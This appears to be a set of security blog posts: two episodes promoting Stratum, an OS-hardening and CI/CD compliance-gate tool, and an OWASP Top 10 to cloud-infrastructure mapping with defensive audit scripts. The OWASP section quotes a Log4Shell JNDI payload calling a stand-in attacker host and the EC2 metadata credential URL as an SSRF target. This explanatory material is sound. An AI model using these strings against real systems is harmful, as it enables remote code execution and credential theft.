Stratum — OS Hardening as a Platform

Reading Time: 5 minutes

OS Hardening as Code, Episode 6
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate · Stratum Platform**


TL;DR

  • Stratum is open-source under Apache 2.0 — the engine, blueprint format, scanner, and Pipeline API are all available on GitHub
  • The platform follows the same open-core model as Terraform/OpenTofu and Cilium/Isovalent: OSS core, self-hostable, extendable
  • Three extension points: custom compliance controls, provider plugins (add new cloud providers), pipeline integrations
  • Architecture: Blueprint YAML → Engine → Provider Layer → Ansible-Lockdown → OpenSCAP → Golden Image → Pipeline API
  • The series taught the user-facing interface for five episodes; EP06 covers what’s underneath and how to build on it
  • Installation is a single helm install or docker compose up — the platform runs in your environment

The Series Arc, Inverted

EP01 showed that default cloud AMIs arrive pre-broken. By the time you reach EP06, that problem has a complete solution:

EP01 — The problem:
  Default AMI → Production → Security audit finds gaps
  (unknown OS baseline, unverified hardening, no evidence)

EP06 — The solution:
  HardeningBlueprint YAML
           ↓
    stratum build          ← EP02 (blueprint as code)
    --provider aws,gcp     ← EP03 (multi-cloud)
           ↓
    OpenSCAP scan          ← EP04 (compliance grading)
    Grade: A (94/100)
           ↓
    POST /api/pipeline/scan ← EP05 (CI/CD gate)
    Result: pass
           ↓
    Production deployment
    (Grade A, SARIF attached, blueprint version-controlled)

For five episodes, you’ve used Stratum as a user. This episode covers what it looks like to run it yourself, extend it, and build on it.


I’ve spent years watching infrastructure teams solve the same OS hardening problem in slightly different ways. Custom scripts that drift. OpenSCAP runs that produce evidence no one reads. Compliance checklists completed by humans who have competing priorities.

The tools exist. ansible-lockdown applies CIS controls reliably. OpenSCAP verifies them accurately. The CI/CD systems can enforce anything you can express as a pass/fail. The gap isn’t the tooling — it’s the integration layer that ties them together into a reproducible, auditable pipeline.

Stratum is that integration layer, open-sourced.

The philosophy is the same as Terraform applied to OS security posture: declare the desired state in a version-controlled file, apply it reproducibly, and verify it automatically. The skip-at-2am problem disappears not because engineers are more careful, but because there’s no step to skip.


The Architecture

┌─────────────────────────────────────────────────────────┐
│                 HardeningBlueprint YAML                  │
│         (version-controlled, provider-agnostic)          │
└─────────────────────┬───────────────────────────────────┘
                      │
                      ▼
┌─────────────────────────────────────────────────────────┐
│                   Stratum Engine                         │
│                  (Apache 2.0, OSS)                       │
│  ┌─────────────┐  ┌──────────────┐  ┌────────────────┐  │
│  │  Blueprint  │  │   Provider   │  │    Scheduler   │  │
│  │   Parser    │  │    Layer     │  │  (parallel     │  │
│  │             │  │  AWS  GCP    │  │   multi-cloud  │  │
│  │  Validates  │  │  Azure DO    │  │   builds)      │  │
│  │  schema +   │  │  Linode      │  │                │  │
│  │  overrides  │  │  Proxmox     │  │                │  │
│  └─────────────┘  └──────────────┘  └────────────────┘  │
└─────────────────────┬───────────────────────────────────┘
                      │
           ┌──────────┴──────────┐
           ▼                     ▼
  ┌─────────────────┐   ┌─────────────────┐
  │ Ansible-Lockdown │   │  OpenSCAP       │
  │  Runner          │   │  Scanner        │
  │                  │   │                 │
  │  UBUNTU22-CIS    │   │  A-F grade      │
  │  RHEL8-STIG      │   │  SARIF export   │
  │  Custom roles    │   │  Drift detect   │
  └────────┬─────────┘   └────────┬────────┘
           │                      │
           └──────────┬───────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Golden Image          │
         │   (AMI / GCP / Azure)   │
         │   + compliance metadata │
         └────────────┬────────────┘
                      │
                      ▼
         ┌─────────────────────────┐
         │   Pipeline API          │
         │   (Apache 2.0, OSS)     │
         │                         │
         │  POST /api/pipeline/scan │
         │  ← CI/CD gate           │
         └─────────────────────────┘

Every component is open-source under Apache 2.0. The engine, provider layer, Ansible runner, OpenSCAP scanner, and Pipeline API are all in the repository. Nothing is locked to a hosted service.


Installation

Stratum runs as a set of containers. Kubernetes or Docker Compose both work.

Kubernetes (Helm):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Install Stratum in your cluster using the bundled Helm chart
helm install stratum ./deploy/helm/stratum \
  --namespace stratum-system \
  --create-namespace \
  --set config.providers.aws.enabled=true \
  --set config.providers.gcp.enabled=true \
  --set config.storageClass=standard

# Verify
kubectl get pods -n stratum-system
# NAME                          READY   STATUS    RESTARTS   AGE
# stratum-engine-0              1/1     Running   0          2m
# stratum-scanner-7d9b4-abc12   1/1     Running   0          2m
# stratum-api-6c8f5-def34       1/1     Running   0          2m

Docker Compose (single-node):

# Clone the repository
git clone https://github.com/rrskris/Stratum
cd Stratum

# Configure providers
cp config/providers.example.yaml config/providers.yaml
vim config/providers.yaml  # add AWS/GCP/Azure credentials

# Start
docker compose up -d

# Stratum is available at http://localhost:8080

The Three Extension Points

1. Custom Compliance Controls

Add controls that aren’t in the CIS benchmark — internal policies, org-specific security requirements, or controls from other frameworks:

# controls/custom-audit-policy.yaml
id: CUSTOM-001
title: Audit logging retention must be 90 days
description: All instances must retain audit logs for 90 days minimum
severity: high
benchmark: custom
check:
  type: command
  command: "grep -E '^max_log_file_action' /etc/audit/auditd.conf"
  expected: "max_log_file_action = keep_logs"
remediation:
  type: ansible
  task: |
    - name: Configure audit log retention
      lineinfile:
        path: /etc/audit/auditd.conf
        regexp: '^max_log_file_action'
        line: 'max_log_file_action = keep_logs'

Deploy the custom control:

stratum controls deploy --file controls/custom-audit-policy.yaml

Reference it in any blueprint:

compliance:
  benchmark: cis-l1
  controls: all
  additional_controls:
    - CUSTOM-001

Custom controls appear in the grade calculation and SARIF output alongside CIS controls.

2. Provider Plugins

Add support for a new cloud provider by implementing the provider interface:

# providers/custom_provider.py
from stratum.providers import BaseProvider

class CustomProvider(BaseProvider):
    name = "my-cloud"

    def provision_build_instance(self, blueprint, config):
        # Launch a build instance on your cloud
        # Return: instance_id, connection_details
        ...

    def create_image(self, instance_id, blueprint, grade):
        # Snapshot the instance into an image
        # Tag with compliance metadata
        # Return: image_id
        ...

    def terminate_instance(self, instance_id):
        # Clean up the build instance
        ...

Register the plugin:

stratum providers register --file providers/custom_provider.py --name my-cloud

The provider is now available as --provider my-cloud in all stratum build commands.

3. Pipeline Integrations

Beyond the curl-based API, Stratum provides a webhook system that fires on build completion, scan results, and gate failures:

# Webhook configuration
notifications:
  - event: pipeline_gate_failure
    webhook: https://hooks.slack.com/...
    template: |
      Image {{ image_id }} failed compliance gate.
      Grade: {{ grade }} (required: {{ min_grade }})
      Top failing controls:
      {% for control in failing_controls[:3] %}
      - {{ control.id }}: {{ control.title }}
      {% endfor %}

  - event: build_complete
    webhook: https://jira.yourdomain.com/api/...
    template: |
      New image built: {{ image_id }}
      Blueprint: {{ blueprint_name }}@{{ blueprint_version }}
      Grade: {{ grade }}

The Open-Core Model

Stratum follows the same model as the tools that have become infrastructure standards:

Tool Open-core model
Terraform / OpenTofu Core OSS, enterprise features in paid tier
Cilium / Isovalent Core OSS, enterprise support/features in paid tier
Vault / HCP Vault Core OSS, hosted/enterprise in paid tier
Stratum Engine + blueprint + scanner + Pipeline API: Apache 2.0

Everything taught in this series — the blueprint format, the build pipeline, the compliance grading, the CI/CD gate — is in the OSS core. You can self-host it, extend it, contribute to it, and run it in your own infrastructure without any dependency on a hosted service.

The repository is at: github.com/rrskris/Stratum


What This Series Taught

EP01 — EP06 in one view:

Episode What you learned What Stratum does
EP01 Default AMIs are insecure by design Replaces default AMI with a hardened golden image
EP02 Blueprint as code — the 2am skip disappears HardeningBlueprint YAML — 5-step wizard or direct YAML
EP03 One blueprint, six providers, no drift 6 providers: AWS, GCP, Azure, DigitalOcean, Linode, Proxmox
EP04 Automated OpenSCAP — grade at build time Compliance Scanner: A-F, SARIF, drift detection
EP05 CI/CD gate — the unhardened image never deploys Pipeline API: POST /api/pipeline/scan
EP06 The platform — OSS, self-hostable, extendable Apache 2.0, Helm install, three extension points

What’s Next

This series closes the OS hardening gap. The same principle — declare desired state, build reproducibly, verify automatically — applies to every layer of your infrastructure.

If you’ve been following the eBPF: From Kernel to Cloud series, EP10 covers what happens when you combine kernel-level observability with the hardened base that Stratum provides: every connection, every process spawn, every file access — visible from the host kernel, on an OS baseline you can verify.

The next series: Purple Team Playbook — real attack paths against cloud and Kubernetes infrastructure, how they’re detected, and how they’re closed. Starting May 8.

GitHub: github.com/rrskris/Stratum

Get the Purple Team series in your inbox → linuxcent.com/subscribe

The Pipeline Gate — Hardened Images as a CI/CD Build Constraint

Reading Time: 6 minutes

OS Hardening as Code, Episode 5
Cloud AMI Security Risks · Linux Hardening as Code · Multi-Cloud OS Hardening · Automated OpenSCAP Compliance · CI/CD Compliance Gate**


TL;DR

  • A CI/CD compliance gate turns an OS hardening grade from a report into a build constraint — unhardened images fail the pipeline before they can be deployed
  • POST /api/pipeline/scan returns pass/fail against a minimum grade threshold — integrates into any CI/CD system that can make an HTTP request
  • Failed gate output tells engineers exactly which controls failed and what to fix — not just “blocked”
  • The gate works on both build-time grades (new images) and runtime grades (existing instances)
  • GitHub Actions, GitLab CI, Jenkins, and Tekton integrations are one curl command
  • The structural guarantee: an image that doesn’t pass the gate doesn’t exist in the deployment pipeline

The Problem: A Grade No One Checks Is Decoration

Pipeline without compliance gate:
  Build → Test → Security scan (results to dashboard) → Deploy

What actually happens:
  Build → Test → Security scan → "C grade, but we need to ship" → Deploy anyway
                                           │
                                           └─ Dashboard shows C grade
                                              Nobody is paged
                                              Deployment succeeds

A CI/CD compliance gate means the pipeline can’t continue if the grade is below threshold.

EP04 showed that automated OpenSCAP compliance gives every image a verified, reproducible grade before deployment. What it assumed is that someone checks the grade before deploying. They don’t — not under deadline pressure, not when the image has been “working fine for months,” not at 2am.

The same problem that made hardening runbooks skippable applies to compliance grades: if checking the grade is a discretionary step, it will be skipped.


A new microservice was deployed from an unhardened base image. The team had built it quickly during a sprint, used a community AMI as the base, and planned to harden it “in the next sprint.”

Three weeks later, a penetration test found it. SSH password authentication enabled. Three unnecessary services running — one of them with a known CVE. The finding: the instance had full inbound access from the VPC and was reachable from a compromised adjacent instance.

The deployment had gone through the normal CI/CD pipeline. Unit tests passed. Integration tests passed. A vulnerability scan ran. The scan produced a report that went to a dashboard. Nobody had a gate set up to fail the build if the image was unhardened.

The hardening work from the “next sprint” plan would have taken four hours. The pentest remediation took a week, plus the time to investigate what had been exposed during the three weeks the instance was running.

The CI/CD pipeline had every check except the one that would have caught the base image problem before the first deployment.


The Pipeline API

The Pipeline API is a single HTTP endpoint that takes an image or instance ID, checks it against a minimum grade, and returns pass or fail:

# Fail the pipeline if the image grade is below B
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H "Authorization: Bearer ${STRATUM_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "image_id": "ami-0a7f3c9e82d1b4c05",
    "min_grade": "B"
  }'

# Pass response (grade A):
# HTTP 200
# {
#   "result": "pass",
#   "image_id": "ami-0a7f3c9e82d1b4c05",
#   "grade": "A",
#   "score": 94,
#   "controls_passing": 94,
#   "controls_total": 100,
#   "scanned_at": "2026-04-19T15:54:10Z"
# }

# Fail response (grade C):
# HTTP 422
# {
#   "result": "fail",
#   "image_id": "ami-0c9d5e3f81a2b6e07",
#   "grade": "C",
#   "score": 72,
#   "min_grade_required": "B",
#   "failing_controls": [
#     { "id": "1.1.7", "title": "Separate partition for /var/log/audit", "severity": "medium" },
#     { "id": "3.3.2", "title": "TCP SYN cookies enabled", "severity": "low" },
#     ...
#   ]
# }

A non-200 response fails the pipeline. The || exit 1 in the shell integration handles this — if the API returns 422, the pipeline step exits non-zero and the job fails.


GitHub Actions Integration

# .github/workflows/deploy.yml

jobs:
  build-image:
    runs-on: ubuntu-latest
    outputs:
      ami_id: ${{ steps.build.outputs.ami_id }}
    steps:
      - name: Build hardened AMI
        id: build
        run: |
          AMI_ID=$(stratum build \
            --blueprint ubuntu22-cis-l1.yaml \
            --provider aws \
            --output json | jq -r '.image_id')
          echo "ami_id=${AMI_ID}" >> $GITHUB_OUTPUT

  compliance-gate:
    runs-on: ubuntu-latest
    needs: build-image
    steps:
      - name: Stratum compliance gate
        run: |
          curl -sf -X POST ${{ vars.STRATUM_URL }}/api/pipeline/scan \
            -H "Authorization: Bearer ${{ secrets.STRATUM_TOKEN }}" \
            -H "Content-Type: application/json" \
            -d "{\"image_id\": \"${{ needs.build-image.outputs.ami_id }}\", \"min_grade\": \"B\"}" \
            || { echo "Compliance gate failed — image does not meet minimum grade B"; exit 1; }

  deploy:
    runs-on: ubuntu-latest
    needs: [build-image, compliance-gate]
    steps:
      - name: Deploy to staging
        run: |
          aws autoscaling update-auto-scaling-group \
            --auto-scaling-group-name my-asg \
            --launch-template "ImageId=${{ needs.build-image.outputs.ami_id }}"

The deploy job only runs if compliance-gate passes. The AMI doesn’t reach the autoscaling group if it doesn’t meet the grade threshold.


GitLab CI Integration

# .gitlab-ci.yml

stages:
  - build
  - compliance
  - deploy

build-image:
  stage: build
  script:
    - |
      AMI_ID=$(stratum build \
        --blueprint ubuntu22-cis-l1.yaml \
        --provider aws \
        --output json | jq -r '.image_id')
      echo "AMI_ID=${AMI_ID}" >> build.env
  artifacts:
    reports:
      dotenv: build.env

compliance-gate:
  stage: compliance
  needs: [build-image]
  script:
    - |
      curl -sf -X POST ${STRATUM_URL}/api/pipeline/scan \
        -H "Authorization: Bearer ${STRATUM_TOKEN}" \
        -H "Content-Type: application/json" \
        -d "{\"image_id\": \"${AMI_ID}\", \"min_grade\": \"B\"}"

deploy:
  stage: deploy
  needs: [build-image, compliance-gate]
  script:
    - ./deploy.sh ${AMI_ID}

What the Failed Gate Tells You

The value of the CI/CD compliance gate is not just that it blocks bad images — it’s that the failure output tells engineers what to fix.

A gate failure in CI shows:

Compliance gate failed.

Image: ami-0c9d5e3f81a2b6e07
Grade: C (72/100)
Required: B (85/100)
Gap: 13 controls failing

Failing controls:
  HIGH   1.1.7   Separate partition for /var/log/audit
                 Fix: Provision /var/log/audit on a separate EBS volume
  MEDIUM 1.6.1.3 AppArmor enabled in bootloader
                 Fix: Update GRUB_CMDLINE_LINUX, run update-grub, reboot
  MEDIUM 3.3.2   TCP SYN cookies
                 Fix: echo "net.ipv4.tcp_syncookies=1" > /etc/sysctl.d/60-cis.conf
  LOW    5.2.21  SSH MaxStartups
                 Fix: Add "MaxStartups 10:30:60" to /etc/ssh/sshd_config
  ...

View full scan report: https://stratum.yourdomain.com/scans/ami-0c9d5e3f81a2b6e07

This is not a wall — it’s a list of exactly what to fix. The engineer running the pipeline sees the gap, fixes the blueprint or the Ansible role, rebuilds, and the gate passes. The gap is closed before any instance is deployed.


Runtime Gate: Checking Existing Instances

The Pipeline API also works against running instances, not just images:

# Gate on a running instance's current compliance state
curl -sf -X POST https://stratum.yourdomain.com/api/pipeline/scan \
  -H "Authorization: Bearer ${STRATUM_TOKEN}" \
  -H "Content-Type: application/json" \
  -d '{
    "instance_id": "i-0abc123",
    "min_grade": "B",
    "scan_type": "runtime"
  }'

This is useful in deployment pipelines that don’t build custom AMIs — they launch instances and configure them after launch. The runtime gate runs after configuration is complete and before the instance is registered with the load balancer.

It also integrates into scheduled compliance jobs — scan your fleet on a schedule and alert when any instance drifts below grade threshold.


Grade Thresholds by Environment

Not all environments need the same threshold. A common pattern:

# Environment-specific minimum grades
environments:
  production: A      # 95%+ passing — no exceptions
  staging:    B      # 85%+ passing — minor gaps acceptable
  development: C     # 70%+ passing — experimental OK
# Production deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d '{"image_id": "ami-...", "min_grade": "A"}'

# Staging deploy gate
curl -sf -X POST .../api/pipeline/scan \
  -d '{"image_id": "ami-...", "min_grade": "B"}'

This lets development move fast with a lower bar while enforcing the highest standard at the production gate.


Production Gotchas

Gate latency on first scan: If the image hasn’t been scanned yet, the Pipeline API triggers a scan on demand. This takes 2–3 minutes. For build pipelines that want instant gate results, use stratum build --blueprint ... --scan-on-build to ensure the scan runs during the build step and the result is cached for the gate call.

Token rotation: The STRATUM_TOKEN used for API authentication should be rotated on the same schedule as other service credentials. Use environment-specific tokens so a compromised staging token doesn’t bypass a production gate.

Webhook notifications on gate failure: The Pipeline API can send a webhook to Slack, PagerDuty, or any endpoint when a gate fails. Configure this for production pipelines so failures are visible beyond the CI log.

# In the Stratum config
notifications:
  pipeline_failures:
    - type: slack
      webhook: ${SLACK_WEBHOOK}
      channel: "#platform-security"
    - type: webhook
      url: ${PAGERDUTY_WEBHOOK}
      min_grade: D     # only page on D/F, not B/C failures

Key Takeaways

  • A CI/CD compliance gate turns a compliance grade from a dashboard metric into a pipeline constraint — the image doesn’t deploy if it doesn’t pass
  • POST /api/pipeline/scan is a single HTTP call that any CI/CD system can make — no agent, no plugin, no SDK required
  • Failed gate output is actionable: every failing control includes the specific fix, not just the control ID
  • Runtime gates check instances after configuration, not just at image build time
  • Environment-specific thresholds let development move faster while enforcing the highest standard at production

What’s Next

The CI/CD compliance gate closes the final gap: even if an unhardened image gets built, it can’t deploy. EP05 is the bookmark episode — this is the point where OS hardening becomes structurally enforced rather than procedurally expected.

EP06 is the series closer. For five episodes, you’ve been using Stratum as a user. What does it look like to run it yourself — extend it with a custom control, add a provider, deploy the platform in your own infrastructure?

Stratum is open-core (Apache 2.0). EP06 is the architecture reveal, the GitHub release, and the extension guide for everything the series taught.

Next: Stratum — open-source OS hardening platform for multi-cloud infrastructure

Get EP06 in your inbox when it publishes → linuxcent.com/subscribe

OWASP Top 10 Mapped to Cloud Infrastructure: Beyond Web Apps

Reading Time: 11 minutes

What is purple team securityOWASP Top 10 mapped to cloud infrastructureEP03: Cloud security breaches 2020–2025


TL;DR

  • OWASP Top 10 cloud infrastructure mapping shows that every category has a direct cloud-native equivalent — this is not a web-app-only taxonomy
  • A01 Broken Access Control = IAM wildcards, public S3, overly permissive trust policies
  • A07 Authentication Failures = MFA fatigue, session token theft, push-notification abuse
  • A08 Software/Data Integrity = compromised build pipelines, unsigned container images, secrets in CI/CD
  • A10 SSRF = EC2 metadata endpoint abuse, IMDSv1 credential theft (the Capital One attack vector)
  • Every major cloud breach 2020–2025 lands in one of these ten categories — the taxonomy was always infrastructure-applicable

OWASP Mapping: All categories — A01 through A10. This episode is the reference map for the entire series.


The Big Picture

┌─────────────────────────────────────────────────────────────────────┐
│           OWASP TOP 10 → CLOUD INFRASTRUCTURE MAPPING              │
│                                                                     │
│  OWASP (2021)              CLOUD EQUIVALENT          REAL BREACH    │
│  ─────────────────────────────────────────────────────────────────  │
│  A01 Broken Access Ctrl  → IAM wildcards, public S3  Capital One    │
│  A02 Cryptographic Fail  → Plaintext secrets, weak   CircleCI       │
│                            KMS config                               │
│  A03 Injection           → Log4j JNDI, SSRF as       Log4Shell      │
│                            injection variant                        │
│  A04 Insecure Design     → --privileged containers   runc CVEs      │
│                            no seccomp/AppArmor                      │
│  A05 Security Misconfig  → K8s RBAC defaults, open   Multiple       │
│                            etcd ports                               │
│  A06 Vulnerable Comps    → Transitive deps, outdated  XZ Utils      │
│                            base images                              │
│  A07 Auth Failures       → MFA fatigue, stolen        Uber, Okta    │
│                            session tokens                           │
│  A08 SW/Data Integrity   → Unsigned artifacts,        SolarWinds    │
│                            compromised pipelines                    │
│  A09 Logging/Monitoring  → Missing CloudTrail,        Most          │
│                            no workload telemetry                    │
│  A10 SSRF                → EC2 IMDS abuse, metadata  Capital One    │
│                            credential theft                         │
└─────────────────────────────────────────────────────────────────────┘

OWASP Top 10 cloud infrastructure mapping is not a translation exercise — it is a recognition that the same classes of failure that compromise web applications also compromise cloud infrastructure, Kubernetes clusters, and CI/CD pipelines. The language shifts; the attack classes don’t.


Why Engineers Treat OWASP as a Web-App-Only Concern

I kept hearing OWASP Top 10 in web application security reviews. The AppSec team ran it through their checklist. The infrastructure team shrugged — “that’s for the developers.” Then I looked at the actual cloud breaches: Capital One, Uber, CircleCI, SolarWinds. Every one of them mapped to an OWASP category.

The confusion comes from OWASP’s origins. The project started in 2001 focused on web application vulnerabilities. SQL injection, XSS, broken authentication against HTTP endpoints. The cloud and container ecosystem didn’t exist. So the examples stayed web-application-centric even as the underlying failure classes proved universal.

The 2021 OWASP Top 10 update is more abstracted than its predecessors — intentionally. “Broken Access Control” doesn’t say “SQL injection.” It says access control. That applies to every IAM policy that has "Action": "*" where it shouldn’t.

This episode makes the mapping explicit. One OWASP category at a time.


A01: Broken Access Control — IAM Wildcards and Public S3

Web equivalent: A user can access other users’ records by modifying the URL parameter.

Cloud equivalent: An IAM role with "Action": "*" on "Resource": "*". An S3 bucket with public read. A cross-account trust policy that allows any principal in the account, not just a specific role.

Broken access control in cloud infrastructure means the principal can reach a resource it should not be able to reach, because the access control decision was not made or was made incorrectly.

The Capital One breach (2019, disclosed publicly) is the canonical example. A WAF running on EC2 had an IAM role attached. That role had permissions to list and retrieve objects from S3 buckets. SSRF against the WAF reached the EC2 metadata endpoint and retrieved the IAM role credentials. Those credentials then accessed 100 million customer records. The SSRF was A10. The fact that the WAF had access to customer data S3 buckets was A01.

aws s3control get-public-access-block --account-id $(aws sts get-caller-identity --query Account --output text)

# Find buckets that override the account-level block
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    result=$(aws s3api get-public-access-block --bucket "$bucket" 2>/dev/null)
    if echo "$result" | grep -q '"BlockPublicAcls": false'; then
      echo "PUBLIC ACCESS NOT BLOCKED: $bucket"
    fi
  done

A02: Cryptographic Failures — Plaintext Secrets and Weak KMS Config

Web equivalent: Passwords stored as MD5 hashes. Credit card numbers in plaintext in the database.

Cloud equivalent: DATABASE_URL=postgres://user:password@host/db in a .env file committed to a public repository. An S3 bucket with sensitive data where server-side encryption is not enforced. KMS key policies that allow kms:Decrypt to any principal in the account.

Cryptographic failures in the cloud are less about broken algorithms and more about secrets that aren’t secret. The CircleCI breach (January 2023) exposed customer secrets — API tokens, AWS credentials, private keys — that customers had stored in CircleCI’s environment variables. The attacker compromised CircleCI’s infrastructure and exfiltrated those secrets. The cryptographic failure was that secrets were stored in a way that could be exfiltrated when the platform was compromised, rather than being bound to hardware or using short-lived credentials that couldn’t be replayed.

# Check if default EBS encryption is enabled (prevents data at rest failures)
aws ec2 get-ebs-encryption-by-default --region us-east-1

# Check for S3 buckets without default encryption
aws s3api list-buckets --query 'Buckets[].Name' --output text | \
  tr '\t' '\n' | \
  while read bucket; do
    enc=$(aws s3api get-bucket-encryption --bucket "$bucket" 2>/dev/null)
    if [ -z "$enc" ]; then
      echo "NO DEFAULT ENCRYPTION: $bucket"
    fi
  done

A03: Injection — Log4Shell and SSRF as Injection Variants

Web equivalent: SQL injection via unsanitized query parameters.

Cloud equivalent: Log4Shell (CVE-2021-44228) used JNDI lookup injection via HTTP headers to execute arbitrary code in Java applications. SSRF (Server-Side Request Forgery) is an injection variant where attacker-controlled input causes the server to make requests to internal endpoints — including http://169.254.169.254/latest/meta-data/.

Log4Shell (December 2021) demonstrated injection against infrastructure directly. The User-Agent or X-Forwarded-For header contained ${jndi:ldap://attacker.com/exploit}. The logging framework evaluated it. The outcome was remote code execution on any Java application using Log4j 2.x.

The fix was not “validate user input better.” The fix was patching Log4j and — for SSRF — enforcing IMDSv2 (which requires a PUT request with a session token that a naive SSRF cannot produce).

# Check if all EC2 instances require IMDSv2 (prevents SSRF-to-metadata attacks)
aws ec2 describe-instances \
  --query 'Reservations[].Instances[].{ID:InstanceId,IMDSv2:MetadataOptions.HttpTokens}' \
  --output table
# Desired: HttpTokens = "required" for all instances

A04: Insecure Design — Privileged Containers and Missing Runtime Controls

Web equivalent: Application architecture where any authenticated user can reach administrative functions without additional authorization checks.

Cloud equivalent: A container deployed with --privileged: true or allowPrivilegeEscalation: true. A Kubernetes pod without securityContext restricting capabilities. A cluster with no admission controller enforcing pod security standards.

Insecure design in the container context means the security controls that should prevent container breakout were never there. They weren’t removed — they were never designed in. The kernel doesn’t enforce namespace isolation when a container has CAP_SYS_ADMIN. The attacker doesn’t exploit a vulnerability — they use capabilities the design granted.

# Find pods running as root or with privileged flag
kubectl get pods -A -o json | \
  jq -r '.items[] | 
    select(
      (.spec.containers[].securityContext.privileged == true) or
      (.spec.securityContext.runAsNonRoot != true)
    ) | 
    "\(.metadata.namespace)/\(.metadata.name)"'

A05: Security Misconfiguration — Default Kubernetes RBAC and Open Ports

Web equivalent: Default admin credentials not changed. Directory listing enabled on the web server.

Cloud equivalent: kubectl access with cluster-admin ClusterRoleBinding for the default service account. etcd port 2379 accessible from the pod network. AWS security groups with 0.0.0.0/0 on port 22.

Security misconfiguration in Kubernetes is particularly common because the defaults in older Kubernetes versions were not secure-by-default. The default service account in each namespace mounts a service account token that can authenticate to the API server. In clusters without RBAC properly configured, that token can enumerate and modify resources.

# Check what the default service account can do in a namespace
kubectl auth can-i --list --as=system:serviceaccount:default:default -n default

# Find ClusterRoleBindings that bind cluster-admin to non-system subjects
kubectl get clusterrolebindings -o json | \
  jq '.items[] | 
    select(.roleRef.name == "cluster-admin") | 
    {name: .metadata.name, subjects: .subjects}'

A06: Vulnerable and Outdated Components — Transitive Dependencies and Base Images

Web equivalent: An npm package in the dependency tree has a known CVE. The application ships with an outdated version of OpenSSL.

Cloud equivalent: A container base image built from ubuntu:20.04 six months ago, now carrying 47 critical CVEs in installed packages. A Lambda function with a vendored boto3 version that has a known vulnerability. XZ Utils (CVE-2024-3094) — a backdoor inserted into the release tarball of a compression library present in almost every major Linux distribution.

XZ Utils is the defining example of this category in the infrastructure context. The attack was supply chain: two years of social engineering against a maintainer, gaining commit access, inserting a backdoor in the release tarball rather than the source repository (so source audits wouldn’t catch it). The XZ backdoor targeted SSH servers on systems using systemd — it would have given the attacker remote code execution on SSH servers across Fedora, Debian, and Ubuntu before it was caught five weeks before broad distribution release.

# Scan a container image for known CVEs (requires trivy)
trivy image --severity HIGH,CRITICAL your-registry/your-image:tag

# Check Lambda function runtime versions against AWS's deprecation schedule
aws lambda list-functions \
  --query 'Functions[].{Name:FunctionName,Runtime:Runtime,LastModified:LastModified}' \
  --output table

A07: Identification and Authentication Failures — MFA Fatigue and Stolen Tokens

Web equivalent: Session tokens that don’t expire. Password reset links that work indefinitely.

Cloud equivalent: Push-notification MFA that can be exhausted by fatigue attacks. AWS console sessions with 12-hour validity. OAuth tokens stored in browser local storage. SAML assertions that can be replayed.

The Uber breach (September 2022) is the canonical cloud/SaaS example. A contractor’s credentials were obtained via social engineering. The attacker sent repeated Duo push notifications — the contractor rejected them. The attacker then sent a WhatsApp message claiming to be IT support and asking the contractor to accept the next notification. They did. From there, the attacker found a network share containing a PowerShell script with hardcoded admin credentials for Uber’s Thycotic PAM system — full access to the Uber internal network.

The authentication failure was two-layered: push MFA that could be fatigue-attacked, and credentials stored in plaintext in an accessible location.

# List IAM users with console access but no MFA enrolled
aws iam get-account-summary | jq '{AccountMFAEnabled: .SummaryMap.AccountMFAEnabled}'

# Find specific users without MFA
aws iam list-users --query 'Users[].UserName' --output text | \
  tr '\t' '\n' | \
  while read user; do
    mfa=$(aws iam list-mfa-devices --user-name "$user" --query 'MFADevices' --output text)
    if [ -z "$mfa" ]; then
      echo "NO MFA: $user"
    fi
  done

A08: Software and Data Integrity Failures — Compromised Build Pipelines

Web equivalent: Pulling npm packages without verifying checksums. Deploying a build without artifact signing.

Cloud equivalent: A CI/CD pipeline that pulls dependencies from an unauthenticated source. A container image built from a Dockerfile that pulls the latest version of a base image without pinning the digest. A GitHub Actions workflow that references a third-party action at a mutable tag rather than a commit SHA.

SolarWinds (December 2020) is the infrastructure-scale example. The attacker compromised SolarWinds’ build system. The malicious code (SUNBURST) was inserted into the Orion software build process, signed with SolarWinds’ legitimate code signing certificate, and distributed to approximately 18,000 customers via the normal software update mechanism. The artifact was signed. The signature verified. The code was malicious.

The software integrity failure was that the build pipeline itself was not monitored or hardened — an attacker who controlled the build environment could produce signed, trusted artifacts.

# Check GitHub Actions workflows for mutable action references (uses @main or @v1 instead of SHA)
grep -r "uses:" .github/workflows/ | grep -v "@[a-f0-9]\{40\}"

# Verify a container image digest before deployment
docker pull your-registry/your-image:tag
docker inspect your-registry/your-image:tag --format='{{.Id}}'
# Compare this digest to the pinned value in your deployment manifest

A09: Security Logging and Monitoring Failures — What You Can’t See, You Can’t Stop

Web equivalent: No access logs on the web server. No alerting on repeated failed login attempts.

Cloud equivalent: CloudTrail not enabled in all regions. VPC Flow Logs disabled. No GuardDuty. Container workloads with no runtime security monitoring. Lambda functions that log errors to /dev/null.

This is the category that causes the 11-day detection time from EP01. The attacker’s techniques generated events. The events were not collected, or collected but not alerting, or alerting but not investigated.

# Verify CloudTrail is logging in all regions
aws cloudtrail describe-trails --include-shadow-trails true \
  --query 'trailList[?IsMultiRegionTrail==`true`].{Name:Name,Bucket:S3BucketName,Logging:HasCustomEventSelectors}'

# Check which regions have GuardDuty disabled
for region in $(aws ec2 describe-regions --query 'Regions[].RegionName' --output text); do
  status=$(aws guardduty list-detectors --region "$region" --query 'DetectorIds' --output text 2>/dev/null)
  if [ -z "$status" ]; then
    echo "GUARDDUTY DISABLED: $region"
  fi
done

A10: Server-Side Request Forgery (SSRF) — EC2 Metadata and IMDSv1

Web equivalent: An application fetches a URL provided by the user. The user provides http://internal-service/admin.

Cloud equivalent: An application fetches a URL provided by the user (or constructed from user input). The user provides http://169.254.169.254/latest/meta-data/iam/security-credentials/. The response contains temporary IAM credentials valid for the attached instance role.

This is how the Capital One breach worked. A WAF instance had a SSRF vulnerability. The attacker exploited it to reach the EC2 Instance Metadata Service (IMDS). IMDSv1 has no authentication — any HTTP GET to the metadata endpoint from inside the instance returns credentials. Those credentials had overly permissive S3 access (A01). The result was 100 million records exfiltrated.

